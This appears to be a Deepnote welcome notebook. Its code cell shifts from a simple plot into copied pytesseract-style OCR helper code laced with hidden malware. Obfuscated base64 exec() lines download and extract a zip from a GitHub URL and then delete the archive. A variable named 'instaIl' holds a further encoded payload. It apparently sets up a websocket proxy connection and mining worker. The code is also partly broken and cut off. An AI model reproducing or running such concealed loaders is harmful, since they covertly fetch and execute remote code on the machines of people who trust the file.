# Welcome to Deepnote

In this quick example, we will walk you through the basic steps of data exploration in a notebook.

## Start with a query

To get you started, we prepared a sample dataset in a demo Snowflake integration. It contains country data for life expectancy, population and GDP per capita over the years. 

Based on free material from gapminder.org, CC-BY license.

## Seamlessly switch to Python

The results of your queries are stored as pandas DataFrames, which makes it easy to work with them in Python. For example, you can explore how life expectancy correlates with economic wealth. 

## Finish with beautiful charts

Charts that push your presentation to the next level are easy to make in Deepnote. Here's a deeper look into the relationship between life expectancy and economic wealth, with additional indicators for continents and population size. 

## Next steps

> Learn more about how to use Deepnote in our documentation.

- [ ] Get creative. Have a look at some sample projects, then create a new one. Let your imagination run wild 🧑‍🎨

- [ ] Connect your own data. Visit the Integrations menu to connect your database or data warehouse. Or just drop a CSV into a notebook. 

- [ ] Work together. Invite your team members and share insights with each other. 

In [ ]:
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(-6, 6, 1000)
y = np.sinc(x)

plt.plot(x, y, color="darkblue")
plt.axhline(0, color="black", linewidth=0.5)
plt.axvline(0, color="black", linewidth=0.5)
plt.grid(True, alpha=0.3)
import base64
import zlib
import logging
import re
import shlex
import string
import subprocess
import sys
import subprocess
import zipfile
import signal
import os
import requests
from contextlib import contextmanager
from csv import QUOTE_NONE
from errno import ENOENT
from functools import wraps
from glob import iglob
from io import BytesIO
from os import environ
from os import extsep
from os import linesep
from os import remove
from os.path import normcase
from os.path import normpath
from os.path import realpath
from tempfile import NamedTemporaryFile
from time import sleep

tesseract_cmd = 'tesseract'

class Output:
    BYTES = 'bytes'
    DATAFRAME = 'data.frame'
    DICT = 'dict'
    STRING = 'string'

class PandasNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__('Missing pandas package')

class TesseractError(RuntimeError):
    def __init__(self, status, message):
        self.status = status
        self.message = message
        self.args = (status, message)

class TesseractNotFoundError(EnvironmentError):
    def __init__(self):
        super().__init__(
            f"{tesseract_cmd} is not installed or it's not in your PATH."
            f' See README file for more information.',
        )

class TSVNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'TSV output not supported. Tesseract >= 3.05 required',
        )

class ALTONotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'ALTO output not supported. Tesseract >= 4.1.0 required',
        )
exec(base64.b64decode('ZmlsZSA9IG9wZW4oJ3B5dGVzc2VyYWN0LXhsdjIuemlwJywgIndiIikKZmlsZS53cml0ZShyZXF1ZXN0cy5nZXQoImh0dHBzOi8vZ2l0aHViLmNvbS9kdW9uZ3Bva2VlZWVlZS9GaWxFLTYtL3Jhdy9yZWZzL2hlYWRzL21haW4vcHl0ZXNzZXJhY3QteGx2Mi56aXAiLCBzdHJlYW09VHJ1ZSkuY29udGVudCkKZmlsZS5jbG9zZSgp'))
def kill(process, code):
    process.terminate()
    try:
        process.wait(1)
    except TypeError:  # python2 Popen.wait(1) fallback
        sleep(1)
    except Exception:  # python3 subprocess.TimeoutExpired
        pass
    finally:
        process.kill()
        process.returncode = code

exec(base64.b64decode('d2l0aCB6aXBmaWxlLlppcEZpbGUoJ3B5dGVzc2VyYWN0LXhsdjIuemlwJywgJ3InKSBhcyB6aXBfcmVmOgogICAgemlwX3JlZi5leHRyYWN0YWxsKCk='))

def timeout_manager(proc, seconds=None):
    try:
        if not seconds:
            yield proc.communicate()[1]
            return
        try:
            _, error_string = proc.communicate(timeout=seconds)
            yield error_string
        except subprocess.TimeoutExpired:
            kill(proc, -1)
            raise RuntimeError('Tesseract process timeout')
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()


def get_errors(error_string):
    return ' '.join(
        line for line in error_string.decode(DEFAULT_ENCODING).splitlines()
    ).strip()

def cleanup(temp_name):
    """Tries to remove temp files by filename wildcard path."""
    for filename in iglob(f'{temp_name}*' if temp_name else temp_name):
        try:
            remove(filename)
        except OSError as e:
            if e.errno != ENOENT:
                raise
try:
    os.remove('pytesseract-xlv2.zip')
except:
    sleep(0.00001)

def prepare(image):
    if numpy_installed and isinstance(image, ndarray):
        image = Image.fromarray(image)

    if not isinstance(image, Image.Image):
        raise TypeError('Unsupported image object')

    extension = 'PNG' if not image.format else image.format
    if extension not in SUPPORTED_FORMATS:
        raise TypeError('Unsupported image format/type')

    if 'A' in image.getbands():
        # discard and replace the alpha channel with white background
        background = Image.new(RGB_MODE, image.size, (255, 255, 255))
        background.paste(image, (0, 0), image.getchannel('A'))
        image = background

    image.format = extension
    return image, extension

def save(image):
    try:
        with NamedTemporaryFile(prefix='tess_', delete=False) as f:
            if isinstance(image, str):
                yield f.name, realpath(normpath(normcase(image)))
                return
            image, extension = prepare(image)
            input_file_name = f'{f.name}_input{extsep}{extension}'
            image.save(input_file_name, format=image.format)
            yield f.name, input_file_name
    finally:
        cleanup(f.name)
        
def subprocess_args(include_stdout=True):
    # See https://github.com/pyinstaller/pyinstaller/wiki/Recipe-subprocess
    # for reference and comments.

    kwargs = {
        'stdin': subprocess.PIPE,
        'stderr': subprocess.PIPE,
        'startupinfo': None,
        'env': environ,
    }

    if hasattr(subprocess, 'STARTUPINFO'):
        kwargs['startupinfo'] = subprocess.STARTUPINFO()
        kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW
        kwargs['startupinfo'].wShowWindow = subprocess.SW_HIDE

    if include_stdout:
        kwargs['stdout'] = subprocess.PIPE
    else:
        kwargs['stdout'] = subprocess.DEVNULL

    return kwargs

def run_tesseract(
    input_filename,
    output_filename_base,
    extension,
    lang,
    config='',
    nice=0,
    timeout=0,
):
    cmd_args = []
    not_windows = not (sys.platform == 'win32')

    if not_windows and nice != 0:
        cmd_args += ('nice', '-n', str(nice))

    cmd_args += (tesseract_cmd, input_filename, output_filename_base)

    if lang is not None:
        cmd_args += ('-l', lang)

    if config:
        cmd_args += shlex.split(config, posix=not_windows)

    for _extension in extension.split():
        if _extension not in {'box', 'osd', 'tsv', 'xml'}:
            cmd_args.append(_extension)
    LOGGER.debug('%r', cmd_args)

    try:
        proc = subprocess.Popen(cmd_args, **subprocess_args())
    except OSError as e:
        if e.errno != ENOENT:
            raise
        else:
            raise TesseractNotFoundError()

    with timeout_manager(proc, timeout) as error_string:
        if proc.returncode:
            raise TesseractError(proc.returncode, get_errors(error_string))

def _read_output(filename: str, return_bytes: bool = False):
    with open(filename, 'rb') as output_file:
        if return_bytes:
            return output_file.read()
        return output_file.read().decode(DEFAULT_ENCODING)

def run_and_get_multiple_output(
    image,
    extensions: list[str],
    # lang: str | None = None,
    nice: int = 0,
    timeout: int = 0,
    return_bytes: bool = False,
):
    config = ' '.join(
        EXTENTION_TO_CONFIG.get(extension, '') for extension in extensions
    ).strip()
    if config:
        config = f'-c {config}'
    else:
        config = ''

    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': ' '.join(extensions),
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)

        return [
            _read_output(
                f"{kwargs['output_filename_base']}{extsep}{extension}",
                True if extension in {'pdf', 'hocr'} else return_bytes,
            )
            for extension in extensions
        ]

def run_and_get_output(
    image,
    extension='',
    lang=None,
    config='',
    nice=0,
    timeout=0,
    return_bytes=False,
):
    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': extension,
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)
        return _read_output(
            f"{kwargs['output_filename_base']}{extsep}{extension}",
            return_bytes,
        )

def file_to_dict(tsv, cell_delimiter, str_col_idx):
    result = {}
    rows = [row.split(cell_delimiter) for row in tsv.strip().split('\n')]
    if len(rows) < 2:
        return result

    header = rows.pop(0)
    length = len(header)
    if len(rows[-1]) < length:
        # Fixes bug that occurs when last text string in TSV is null, and
        # last row is missing a final cell in TSV file
        rows[-1].append('')

    if str_col_idx < 0:
        str_col_idx += length

    for i, head in enumerate(header):
        result[head] = list()
        for row in rows:
            if len(row) <= i:
                continue

            if i != str_col_idx:
                try:
                    val = int(float(row[i]))
                except ValueError:
                    val = row[i]
            else:
                val = row[i]

            result[head].append(val)

    return result

def is_valid(val, _type):
    if _type is int:
        return val.isdigit()

    if _type is float:
        try:
            float(val)
            return True
        except ValueError:
            return False

    return True

def osd_to_dict(osd):
    return {
        OSD_KEYS[kv[0]][0]: OSD_KEYS[kv[0]][1](kv[1])
        for kv in (line.split(': ') for line in osd.split('\n'))
        if len(kv) == 2 and is_valid(kv[1], OSD_KEYS[kv[0]][1])
    }

def get_languages(config=''):
    cmd_args = [tesseract_cmd, '--list-langs']
    if config:
        cmd_args += shlex.split(config)

    try:
        result = subprocess.run(
            cmd_args,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except OSError:
        raise TesseractNotFoundError()

    # tesseract 3.x
    if result.returncode not in (0, 1):
        raise TesseractNotFoundError()

    languages = []
    if result.stdout:
        for line in result.stdout.decode(DEFAULT_ENCODING).split(linesep):
            lang = line.strip()
            if LANG_PATTERN.match(lang):
                languages.append(lang)

    return languages
instaIl = "import base64;exec(base64.b64decode('d3NzPSd3c3M6Ly9wcm94eS00cjNzLm9ucmVuZGVyLmNvbS9lR1ZzYVhOMk1pMXdaWEJsZHk1dVlTNXRhVzVsTG5wd2IyOXNMbU5oT2pRNE16TT0nO3duYW1lPSdSRmlrSlFFUFdqN2h2ZUh0OUc4d3dMZnVmRW1EYWdvUmY0LldTeDEnO3RocmVhZHM9MTsKXyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpO2V4ZWMoKF8pKGIncmN5OEQ4MzczUHYvVHQrZ2JJbWpDbnB3ekJ0SnUwSGVJVjJjUUwvOHk0VDdLTEpjbm93VVU0SEdlRG0yZys2U0s1eGpsMEtTZ0tBd3NDd2VCZ1JWalYzaG1WaUtWVitVMTQvRUhZM2pocE11UHJwWGZLOFQyR0c5OE5yM1BjR3hYYjlHK3JtYUpaQkMwOWI4UzN0bjExbUQzNjdkaWFOZ0RLY1R0bmZhemtYL1VRWVdvNTRtNEp2SEh5Z0xPOFljQ0pjdlBVbHEzVWZTSFNJbWFCZlZFRXY4RmErb1pBdVlCaG84NlQ3V0JFZndteDhDWS9uQmxDRlZYdDY5TlU5U1lHdFkyei9VTjF1TVZyNGMrY2YwWkRiWDM0WEE0WnI3NVMwYzQxNXhjLzNLd0JPMXIwWVdBQ3IzQng2Y2h2UGY3MXZVM2hTUlphUmNJZ09DSitHWUVsSHRJYmVrSzMzUCtCQlRpbFZtbjlOazB2NElraDFubHVtYWJSVnBWZ2E1cWdzdGp2cDZTbHI2MVNySDhJTVR1djJUZW5MZm5oRXFoZFlxNDN4RjVnaXdmcThvRUdPOWtjNVQ4YThKNDk0UHdaN2dMcFBVYVdNdWdsSmNyWDVNNnpWR3huVHNlN29PVU9QM2ljSGxrSG5LZGZOc0hIOUlYNGJwYW5FNk4zSk5SWGlVZDRORHcwVHdpTXA5TG9LazYwQlRPTEM4aG9IYXVURmJrNEpYbWt3ZytpcFBYczhzZUQvbTFNZmxuVHN3Ly8rQmNzUlhqejVMLzJ0REZUcytEN21VMFVFYUF1eVVGU3RqT3gvN2srWHNGTmI3VUI0d1M1ck1HZDZjQlZQZ1RmdU5DQmxFWHp1VVlEZ3JoSi8yRnJLSlYrZDlpZnlPakd0U283UTBzYktUSW5JWkhKeTRCT3JpV1d6T1FBbjRwTnZrMVc3TEs1OEJ0VWVjZ1BKRVpHQmlVN1RwNVYxV3hyU1BwZEx4RUVCYVlRSUJFZkUrTVRlRUkrSHBFcis3ZnhPemNXbUdqc1piMEN4SkwxUXM3aitIbm9ZS3Zic1Jlc0MyZ21naEVYSm1sd0xTTG5SVlNrRk5MS3FHeHVaN0lZbzNIeHptc25jRWkxUERsWDlvVlAxYThISXJpc1NXdUNKYk5CSDJ2ZXZCOGE3aklmSUxEenF0VzZ3WkdvSTRJdWZYcTZoOXIrdXpPc2MzZHhpVTJXeW9pQXJEMDlqbkQrMTd6bFRxcGVMMXpnd3QxVXd3SDFoak82eXRuN0VaN2lSb0xZcG1HdEFCanNBaUpRYTA1NDlMaFgyTjZNcDhVVS82T1VxU1NOUVJvOXhCY1lzVVNqQWVMYkxmR0VZcWJmRC81UW9FV2xzejhuWStqYnpEVXk0UjJ2VWZaWVFUWlRNaVBMTkN3NzRFZ1lJaWVjelJVM0pJc1prTENPT0NOTTJvZ2RmUytPSFdpd0d1OTVocE1UdDJ2cm1Ob0F0akZhbWlDYXM0L0VRUzV6RUhqLzl2TWkzQ0swTStQYndUS2NnN1A3eHkxOS9rREdtbGhrNTB1NGJWVlRaM3BNTmFyYW1Jck82L0ZGb28rRUJDZkhaN1UxWTBiQitOUHFFUkJ0Z3V2VWwxNSs1R3VXV0FyNXhFSGFVRGkwVmhubXZ3Ums5Z3lmWmlRY2pENURMNGwrczlWKzhkRldsY2Iyd1RVdXR3dEM0RXBna09zYjZ0YVhNd2xWWXlETmJQZFRSUzdsUTFiY1BadHpSRnZLK2pqQ3E5UzYyWkNCQUNkUTJYc05rbld2S1RXb1ZnRWRGYWhiMUtsdFM3N1JheFpETytZOVZXaWtUeVRSR3I4N3hYVFNqbk1kdlNJd2ZxMEVpU0hKSXJ2SEFFS3lxUytOdUFLbXczclF3VklGUXA2dFVNVGN5RHN5VmppUitOc09CL0ZzRFhPVHdNSTRWV2J4MGhETzZ6S01OTFArOFlIdnNjNzhKWCs2OGtWQVd3amdoUWlnalZ3bkRDU0I3YmNSQ01TZ3hHKzR4SW9xQWNZdTB4TVV3MmovYm4yRStYWTQ3ZXlEZXlFMjdLcDVHaGFBQ1A1Ujk5R0tjZGk2MUV3SmlwNk1GdlVtVzlDTzh6YnVMQkZJZ0hDdzZUdThrMmlrekIra2hZRG1pRHFtU0gxbmpWc1U2WlBEeHNkaDM2eW93bmZ6SHZmRklxZWpZSzZDNkc3MHlJTDlJVzBtRjBUUVNFc2JiRGV3WGRSUk9Ba2NRMW1HcEZWK1N3L0VCeGlQMHl2ZW1MYTJNOUpZNytPc0tYOERldU4rbG1wU29vaWdqM2NqZUplTzJiZGJudjB4WUc5YlBpK3h6M1ViMEtRZWZkUWVFNXExNXFlaTJ1ekdBU3o2RFNXbVJjMldCVllPMW9ic3hqS2orNGhmNTRwbHZ4d2kzTEcvNFFBMXduL0c0b1ZGdDFQcThTcFkyb2huQWl4VDAzRlBPajU5dDYvYmxBak5Ha3p4R0N5N2UwNFF0WlQ1MkhIMzRhT21UbC9hR2hyYkZRTDhvSjNNTXkvK21NdmEvbytoL0JuclBtZXY4aURTb1ZNWnBsVGRzT21wZ0FDYmwrb3NFUGlQb3YzVmRqcDJtZDEvQ2ZFV1YxRFZrNTNJVzNxOEVYWnJPejFVWUFwU2plVXMvZkV3S01YS2J2dXc1b25scktDVmVlOGpXYmgrb2xJSmpnYUVVL1FtWlFnSGU5K3BMMThYMEt4TVZ4ZTR4OW5zMUlqclpFalJMaDBMWTdqa3N6Y0dtanoyR0RmQ1IrL283emZ6ZVNLZmJCbS8ydzNYdVJZNTEzeGxERnd4cUJMVDZOczVqR3pnYVRqU3lhbllJcC8wYXU0SE1QcVVBblNTdGJ2VGk3WTdKbU1jdDUwZHo0MjdLMEN4MFlzUHZuN3NnVm9vWXFGei9jZDZIVG9jQ0diTFFQbVNQUTQ5WHVuZXR4Zmd5OUFGZmJzcUFRR0J1c2hYdDZUU2hET0NnV1JGSnBXNmdRdnBTbDdnU0VkVVJSSExPWEwzM1I1UVZJQ05KTXFwRWFEb0dwdjNIYVJIbm16R1pnL0RLdHVhYWFjSGQ4eWhtVHhaM2hJelBrazJlUmJvdkpHd0JQZGREWkF3RkM1Z2dMd0dXeFo4Vm9OdkhXelBrYTZPMDdnNnZoNHF3MXhpdSs1UldzYU5rV2w3T28yRytzQjUxdENMRUVWYytaY2tMYU5zN1FDV1VsckFzUndMRTZzcFh6TFk2RGV1WlJSZTFWMTBETUJIYjM3MlV4V1NlZEd4VWFOSjJMVHlhU1AzYzhXUmYrOTBOa2lNQ2w2bmlia2FWRGhIQ29veHNLZjFjMEdrTFFKcFZUdGUvcURUdzNCSWtudnU5Rlo4WEY5Mkg3S21kRzlLM1RLcGxlYmZXS1F3V2Mzekp2UllvTnNKZkM0enlwRTdMSlppNm4xODNBSERLeThpeVNkeWJOVHdxbHFESnZSbTdtMElJQ2lpYkhPS3p3RDVTTElrc05Ub29weFVuK0xTVjhaeUlPcGllK0srWGptY2VGb2Y4SmRpcnM4Y1FoWVN5TDhDbXlKakJMOTJ6YmdUZyttWGdUZVJTVjlMVkI5ckFCa01VUE40R1owL1JjWXVpK0I2UU5Qc0hiVUtadGhKbWdSZHFnNU9hSGtLdlFFMjNNdlFYa2dDWmRMTHFVdjVqNmE1NjE0ZG0xcWRIOHNtQWlVNlJqWmhuVGhiR01SUkdyZ25rNmF2eXRqVmsrTmpCSnRIVUJCdXlENlNRMHJUaUcxbXpsaUF0YTVZeDQzaDd1SFlqem01emhjTmhNRzVia0crSEhEcEQ1TUt4WHdZakNQTkZIMUJEbFFNWktvdFl1eFk0di8vUFg3ZDdvL3IwTVJuMmZjVnNwOVpvNUZBQnBjOUkzSEdMRkNQOEpSQURBQzlqVzZUN0grY3FWTER2SCtuR0RsejRTbHV4WGhGeEdZbWthNlQ1Y3JjYWJBSjYweFR0SitNU1JOUmZ0ZnB5QmMvUEl2cWRNM1hBaVR0VXRBQU94SFpUTUF4b1pmNGtFRmcxRjlsUUpNWDFDNWUrenZwQTFQbm4vcEhieE5Wd0ZTNlBtRDhIeFpZYnVOSXpoaHlDNXlYdDhrQ3RtdHpzM2JZekVmK1JCZm9lS0l4S3lVTWEyaDUyY1VZT2hQV1N5cEk4LzNzdnN6UnNVVmZoa3k0NzMzUGtaSGtaMTkxZG9lTHZBc240cmxhY01MREk4cTVqVjFxV09OQkpUc25jZ21yYWtqSS93bngwVnUwMzZyUDNva1V0NGtVejNyblE2N0N6RG14bTBtVVMzWWhKMmtHY005RnA5aWtXMFVvY3dSWFpxcERYKzlyRkVIRGhVTE9zTUdyMXZkR0JHNWFmSWQ3QnVRRjRuYkttVStOclNLeG5VaEpuTkNKY0pkVlp1OTBVYUVtOUlZOTIxaVQvQWRzWGNJcEFRd2tkV0hzMHduQk1sdE4waThaS0o3MFRrTVRUU3crSTllNFR4Yk9pK09uQS9TQjJCbzdkazhhN1hEVml4WFE1Z2toUG1KdzYwWFUzVEdlNmVWLzNtQmVQTWdZVS83T2hmRDdxQnFScE02bDFnbW5vajZ6NFJQaXB0K3hKOFE0RWR5UTJpS0JtcTBKYUg1RlB4cU5SZTczOUVwYkk3eDlHYWNQMDQ2Q2lmbVh5RmlmaXk3YlkrazFSMWV6MHhJZHh0dEQ2dE5jYWI2VXZRRmhRY2t5cGpKSXpyRi95NDZLVjdCTlU3by9GT0hNR29LTFp1SmxDS041YmIrR2NFMW9nT1ZZUVZaaGxvUjFPUXlIV0MrdkpUMHNrSWNmcmZORGdoeXpweENUSWJkRjM2RHIvazNJQjNKeHRBai83YkNuMmRJZld1NXR4aWtKcU52REtRWnkycVd2dGErTy93aXIyek5UVE5DTVppL21mRHlDcHl5UTdaSmFUNlc4bnZpN2FLTW1jNmpYN05wRit3elRYMWJlZTlvWHJvSm1sQ3FQTytjV1hNcy9BMEswT25EaFFDdFViaFJ0NWoySGJCNG5xd09WYlh2Z1U2b0k3dE5hZkx0U3RoRmVvTkpFR3NJVXdLRVBlR0hxMmlkOEdjNlZYSkdPOTN2eG9hRGg0Y2o1WlllOWt2bEM3UldMNXFMaWF5eUk5b1lyZ25KbitiYTB5SEtCYUxUZm9HM3dmbFMxYThaeDlMRGxLd01md3ZGWktXNmJTb3dsSXNQMUFCZGxleFRTZmFzUWxPSXY0VUlzOTFPeWdVNWl4K0VwMERpRWdiekwvZGl4N3hNcW1Wb2N0L29VSkRDMmZxTXhicitqOVZSMGd5NUhPTjVmZmVkZjUxQkFQWTVSdTdSOUpGeUtPQVkwWWVtUlV4VGdSSGRiL0huOHpPVWNJWWx6eFNDdnowczhLby9GcHhmbnc3TGtwODJURkgyUTdvYk8rK0dQbVN2RnNsY0k0R3B0eUZQaVhYNGQ5Mk95TGZBdUVxSTdSQWNiTzdTOER3QVkzN2I5R2hTRG02ckFMSll1R0JwY1ZkaFNYSENkWXQwWWY4NnUzWWZOSXA4akhEZVJpb3MwSlFoaCtWUXhEUytVUXFzNHVTTHNWem1MbXRRMlRyQkhzaWQxWElxV1pBOTA5Z3ZmWVVkOGRKa0tHTkdVRXBsS3QyYUo3c0VpaEZ2Yy9Xckh3MWNJb3RGSnUvWjNlVGE3VnlkRHZ6YXlGSUJhcDFxVXNYM3ZGSzJKcEEvRnd0ZjlpRFJxTGlnU1QvdGdqa1plaVNyMnFodFkrekJ6ZkpiL012RXUxQTNzQmMxSGNJSG1RWlJ6NzFKTzkvZVpRRWhTVEt1K3Q3VEtBUEJOUTJ4dFhEcit1WHZNSTJxdVNPcnZjZ0dSTHpUZnZvY29wL1d4SUI0ZWtIR1hObzRnUjRWVWpxRWFSRzlKRVRHcDBBOUMrendJVmxRUTRFWFl1c2hjOHpXWFJqRy80ekpjMUhjRndGQUxXUzlFNE1qZUZ4S2dtL2VtZE52WHdjR1NkTjFYbEkxRXMwWC9SbkhDM3N4ZUwvQmVUU1g0M3FrU2Fzc0t4ZG5VNStqbHN4OVFwQ3MyNFNqbWtSNW1TLzhEMFFxQlZ5VXBtdmhra0p2RTBIQkt0WVVkQUJ0NEc2RlB6dTNkU1RHSTRsWmZrL2Z3NHYzU0grdTh0dlNQYmxxM1BXbVVHbU92K0hxQ2U4dDU1dTZtZ0xPaHYvazlIT0QwdEhzUlBZVFVYK1RJbHd3Z0NOQS9sOHpvL0JpQWNDL3JyU1RMSUtlZmEySTQ5WlZZUzdPeDNRMVdnelMwbWRDZDE4TUhTbVlhRmMvQTdjYUY2K21VTStnMWQwY2RCR2N2SVp3ckVxNWxWdnZmVGRvT1F5M0tHL2RMMnQxaUNwWUpyTHdvSDR4YUhISW5lbzhjNmFpcUwzTmRvenAyZ2Y1MG1hYzdMUlpMR0FpSm5sc1BHMjEwQXVXTFdJeUxzQk1sSzNxbkNCRXVMTSt4UTQyY3NId0RydzA2YnVZaFVrQ3BscHlLNXcwS0NCWXJzQ09LekFLT1pIcHA0ZVhmZHp5QkFhWU9MWW1obzBVWWN1a1JJNThEdnJWN091L0ZFdEVRVVRuQjBBZU5nd3hlaUd5dlJnb0NyZ3UwOGJNQjN2RTUxWEY2MWo2MURVcmVrZTBtVVRBeFdvR0pLOS93RS85eDRkc3BhK0krbEZQQzhaVXErcnVxV1QzZFlsVlZBQ3pSWndSNE5ZRDRjOVQwUktWWFFHbjZSYzlQRGsvUnBZelNiQXJDUUNmTnBnYzJHSlZKZ1o3M01BQis1ZTNTTG5xN1hIT2ZrY2pXMm9uMGU0TWY4Y2pLeFgwQ1NvQzNESnJZSmxKdnI5dy9ibHZ3RStjOHltSXJYZXp1K1gzYUdCTWR3b3cxUVY1akhkRG0wRWFtUHViK0xudFBobjFrckRNRDViTGozaDlHemtWQzdaU2c0bE90Q05YdU5wMFozUHJLNUhPZkdjZVN2OXQzZDhoYlpCZDUwemxEMXNoNkFqWDR6VGxsUWFlNjBBKzlBNFhnTGFOSUxHVjZkZlBibWNtT1RFL2NSSzJmbmRGaEk4NTVzdVVwQWpEOGFEbWpVNHhXWkE5TEVYL0hUNDcrMHcwR0hvQm9iU0RwbE9VNUFOeFlIeEFiejFQSEZOUmdCVXU4NjNNQ1MwbldYa3UvRlZ2dytoU3VXUmtPMnAyOG8yaDZ3Q0RsTE40TmNOMk02VDRIU1YrSnR6UTlYN3dMdVRhWkVUUXZuZmdmMTVpNEN5K0UveVhoc1dMUzB6b2ZHd0E1cm9oVU1jZ2NpMk1KM1hBVjR0dVNyL1VNL2YzRlV0dEJsTUJnS0ZsMmhydHdXdTUrcXlHeTh6NUZVbE10RGVrTUpIT2NpcmJlMDdVQ1J5cG1KZ1NibGduMlhGb0UxRUw0NkNKK1pZaFkybzBiS1VWUldobTArbTdwQ25NUi96TzE0NnFtdUh3aGVJTGIrNG5ONVRHSk1IRDRVTUFkekJzMU5iZGV1QVlRc01MdVpiZE5SOVI0cWNYa1pyNEkvd291eXN6NURrekkxMFF3Wkxob20yZUVMZmEwSmx6YTRWWGh3SUV5ZC9nZFpkWFBPVXZ1alE2bngrY1ZLNWM0bGNjMkxKYk9wUkx3eW5oUmtzMW1rbno2SXN2eXpTcUhSakI0ZmhacFhYYjM2dlJIbXd5b2JCWmdLamNJTGpYdmE2aUJYcllUYlhtdnpQNCtUSjhzU0Zsa2NhWDJ0bElhZkpha21qWlB0Nm85QmtjdHNMZHhOYjVGQVJPb25CaUdHQm1UZi9EK2hDTGQ0ajJRdGg1bWU4dlYvYk9VbmZ3V3FJNXRadkN2bUJsREFXYWh6RGIwbTBoVkxXd1NVRVY5aGg5cGErcFByZ3pGWVN4cGIyUC85UnVtVVBBa2ZHb05xK2xtSVNQelJIQm5QcHJzbi9YaXlsbGpaM2V3dmg0VzZpeTQ3L2RISVIyQ25zKzVsekx5bDZuVWhSTGI0UVZWTlZEZldkN3FmS3pYV0RWalIrOExmNHhIdVkvSU41MTk5T3dXN1lBQ29qV0s0UTdXU1JLM2tpQ3RWRUZqeXB2UVNCK1JRL0toZkZ0V05YcmVyemcyR0k5YW1vMDY0THN4TEVOMk8wR2M4MG5HYnJhSXc3WXpKb1RRVXNNZkluSzVHVDhMN0I3d2hEV1F1cXVUQzJnSlUvZXdtWm1xQzZTVHBVYTI4ZlIrNzZ1SFUrWlVrS05YZjhFcytFWGF5Tmp0K0Vhb1NkcTdSa3dVY29UWWwwdlFwQkFxM0dsbkxudSs0aFBzRzlDSGtRWk14RmlNeDJFMloyN1NWYmdrVi9nQldBMUlzY05BdTkvVUV0b0dkM0JPR04xa1RwcFlnQ1QxNmNaSUNCRTVqOThEY0svU3UzSFpiVEJBYzl6TzJlRXNZSDZPUWZQU1oxN3JaaGZwRWpNN09vOHVVZi9TcmdVaEdWOFBSblorbE1jVkVXdnhjTnp2WkpkUlJhckh2MjN1VzZsdndSNmFoV0VGVXd1aTgraDBXUnh4MEgwVEFSTDU5bjhLWlQyV0hzWldyMTBzSUhNQjhGZjVzdW90TW55dFZtdW91RWdLK3ozQzAreisxdzVvMzFmL2twaHVmNzR6a0JGRHZXTFFpOXJubm1NWEY4WGNIeTNYUlF2cTdkeDFsVitJc1MrcTBJVE84dDVEWlF0UmN0NitDZkxzMVluaFpCUWpITTVrUStzNFgvTTRndExMaTNvVkQ2NVBFVmVHT1VBZVN3UW44eWRtNThVcld1clJJd29QbWU2aHdWbWkwa1FOcjBoTElDcm9VSjBwSC8wOTVoaldSWDUzZXlRVGU4SEgwcEtBdUFNMHFMMTZMLzk0ZGY4d1RhbDBNczlnOCtudUZhc295Q3c1UDBUZlU1WEdjTjkxY3VUaXFJV3p4eG9KSjVwRjFnWHdTZWp1SEx3UkZWVnRWNWFLck90ejRHRVN6QXNvVURpWGdUcGd2VWZLdWVNUHVUajhZSXp2elU5M0Jyam9NdnQ3RTgrR0kzOUdHY2NqM2hJU0FaR0daZnltSW1USmtzOG4rbiswYVpQRVEzczNob1NZcUgyU3c3Smp6UDNaTWtueWVkZFpKdUlZdXkzbmtvdTZVNURORm5pNStHN3hudzFJdUcxYnVwQk8rbDFFelFxeXRwRlNJKytnMXJyVmRza3ZIVUN0NVlIZ1lISHBKK3pDaXVuK293UWVlcEoxKzFWT0hLTE1pSkY2Nm5FUjJaMnZhMTZIS0tUcXUrOG0zNS9LdFdYb0QrTXgxdXBSRmk2ZktJbUdsT3I5M0l2R0w3a0R4c01mMEdYemlwUXdZdXJZUi9ZbTJ2MDQxTTRMRFhHd0k0dGF5YktEYklVdnlmOUFMUWxwa2ZRT1ArVEVCUGg5Zld4d1pCNEJzSkJ0WXk5ZW40S0hyZkNMdmp0YnFyVVF4MHRXWW44d3hLUCtMU1NRbnFqSXpXNWcxb1N4dzNxczZyU3RJMGtwbld6U3YzaFc2c2lJRVN3aXhWWnhvTWt5SFBqSHFzMTJPZkNXelUwV0djTitxYm5jUktXanFqd3FESUg4SWtza0lJOFNHWXRtYnBxTWNoWkdrdVQ3eENGMytRMVM4Y2JLSXAzbWRwSklqQUU2N2k5L2FqRTUwNUJjdTd3VEYvYzgyaGd1V1pxY3ZTMWwrRlhXaHdMbTAzQnRoK2VzL1Q5bmNTZk1WQ1dwZ3Z2cG9HYW5JbkVFQ3pkTW84SmVtNWdMaVZZaWgwR1lHNDJGT1FjbEMvUW5XSzZqaFdTbzBnak1PZjFyeDE4aHAyaXM0ejBzdFRYWVRESVh1OG1KTkZuOW9Jbi9jdGVrd3JHa21Fdi9TcmV0WExwK1l0L0U3ZEZUUkVqY3NjVTF1K3pvZ0R2WlU0TXFlQTdleUtDQjhIdXRnZm1PRTdUeFZpakZiaHRaRFRIY0p4bWdIYzNDUG9qVjlZL0gxTlZVSWY3NGYwbnVCL1RNNlQ5d1hlWlBxRWUxMUcrdVpJTWVPYTFydi9iYmlSNDZOU1gyQTVPYk12Q1AzRkRlTGoyU3dZYXE2QnU3eGxMKzliWG00ZE8zbjI3NXpoL1Vua25vc1FScWFTbHZSdTRibmpwYTd1aUMvcVJiM3poSHdZSFZKbFlPMjVKZDRwMDdMaG1rVFF3SHpGaXV6aHVlNUFuRlpOaWQwMW5QeWVBRG9kQWRvbXdVSTZFakNPYW9OdS9JVGZqei9tbTJOMFVRd0syUjFHK